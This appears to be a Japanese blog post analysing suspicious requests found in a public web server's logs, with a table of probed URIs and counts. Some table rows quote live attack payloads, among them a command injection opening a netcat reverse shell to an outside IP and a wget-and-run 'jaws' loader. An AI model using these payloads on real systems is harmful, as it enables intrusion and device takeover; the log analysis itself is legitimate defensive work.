公開している web サーバのログから通常のアクセスではない通信について分析しました。
多かったリクエスト
ルータ等のログイン画面があるかの調査
login.cgi
.envの調査
/.env
Hikvision製ネットワークカメラの脆弱性(CVE-2021-36260)
Hikvision製ネットワークカメラの脆弱性を利用するリクエスト
Miraiベースのボットネットに利用されている脆弱性のようです。
Miraiベースのボットネット:MoobotがHikvisionの脆弱性を標的に
/SDK/webLanguage
PHPUnitのevalをリモート実行
PHPのユニットテストツールのPHPUnitの脆弱性を利用してのeval()を実行しようとする通信
Webサイト攻撃にあったログを見る。eval()を使うPHPファイルは狙われている。 | ただ屋ぁのブログ
/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
Wordpressの情報取集
wlwmanifest.xmlの調査
Windows Live Writerというツールの設定ファイルがあるかの調査
/wp1/wp-includes/wlwmanifest.xml
/wp/wp-includes/wlwmanifest.xml
/wordpress/wp-includes/wlwmanifest.xml
/web/wp-includes/wlwmanifest.xml
/test/wp-includes/wlwmanifest.xml
/site/wp-includes/wlwmanifest.xml
/cms/wp-includes/wlwmanifest.xml
/blog/wp-includes/wlwmanifest.xml
/wp2/wp-includes/wlwmanifest.xml
/wp-includes/wlwmanifest.xml
/website/wp-includes/wlwmanifest.xml
/sito/wp-includes/wlwmanifest.xml
/news/wp-includes/wlwmanifest.xml
ログイン画面の調査
/wp-login.php
/post/wp-login.php
参考情報
Hikvision製ネットワークカメラの脆弱性(CVE-2021-36260)について
JVNDB-2017-005280 - JVN iPedia - 脆弱性対策情報データベース
不審な通信の一覧
| uri | count |
|---|---|
| login.cgi | 559 |
| /.env | 394 |
| /SDK/webLanguage | 253 |
| /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | 175 |
| /ftptest.cgi?loginuse=&loginpas= | 146 |
| /set_ftp.cgi?loginuse=&loginpas=&next_url=ftp.htm&port=21&user=ftp&pwd=ftp&dir=/&mode=PORT&upload_interval=0&svr=%24%28nc+31.7.58.162+1245+-e+%2Fbin%2Fsh%29 | 122 |
| /wp-login.php | 117 |
| * | 103 |
| /ftptest.cgi | 96 |
| /sellers.json | 80 |
| /boaform/admin/formLogin | 80 |
| /.well-known/ | 73 |
| /wp-admin/css/ | 71 |
| /uploads/ | 71 |
| /sites/default/files/ | 71 |
| /images/ | 71 |
| /admin/controller/extension/extension/ | 71 |
| mstshash=Administr | 65 |
| /.git/config | 55 |
| /sitemap.txt | 54 |
| /sitemap | 54 |
| mstshash=Domain | 52 |
| /xmlrpc.php?rsd | 44 |
| /wp1/wp-includes/wlwmanifest.xml | 42 |
| /wp/wp-includes/wlwmanifest.xml | 42 |
| /wordpress/wp-includes/wlwmanifest.xml | 42 |
| /web/wp-includes/wlwmanifest.xml | 42 |
| /test/wp-includes/wlwmanifest.xml | 42 |
| /site/wp-includes/wlwmanifest.xml | 42 |
| /cms/wp-includes/wlwmanifest.xml | 42 |
| /blog/wp-includes/wlwmanifest.xml | 42 |
| /wp2/wp-includes/wlwmanifest.xml | 41 |
| /wp-includes/wlwmanifest.xml | 41 |
| /website/wp-includes/wlwmanifest.xml | 41 |
| /sito/wp-includes/wlwmanifest.xml | 41 |
| /news/wp-includes/wlwmanifest.xml | 41 |
| /index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 | 40 |
| /post/wp-login.php | 35 |
| /app-ads.txt | 34 |
| /HNAP1/ | 34 |
| /shop/wp-includes/wlwmanifest.xml | 33 |
| /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application | 33 |
| /2019/wp-includes/wlwmanifest.xml | 33 |
| /actuator/health | 32 |
| /actuator/gateway/routes | 32 |
| /owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f | 31 |
| /owa/auth/logon.aspx | 31 |
| /owa/auth/x.js | 30 |
| /_ignition/execute-solution | 27 |
| /post/20201116/ | 26 |
| /Autodiscover/Autodiscover.xml | 26 |
| /console/ | 25 |
| /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh | 24 |
| /solr/admin/info/system?wt=json | 23 |
| /media/wp-includes/wlwmanifest.xml | 23 |
| /2018/wp-includes/wlwmanifest.xml | 23 |
| \x00\x00\x00\x00\x00\x00\x00 | 21 |
| /shell?cd+/tmp;rm+-rf+*;wget+0.0.0.0/jaws;sh+/tmp/jaws | 21 |
| /shell?cd+/tmp;rm+-rf+*;wget+synns.cf/jaws;sh+/tmp/jaws | 20 |
| /manager/html | 20 |
| /sitemap.xml | 19 |
| /x.php | 18 |
| /alfa.php | 17 |
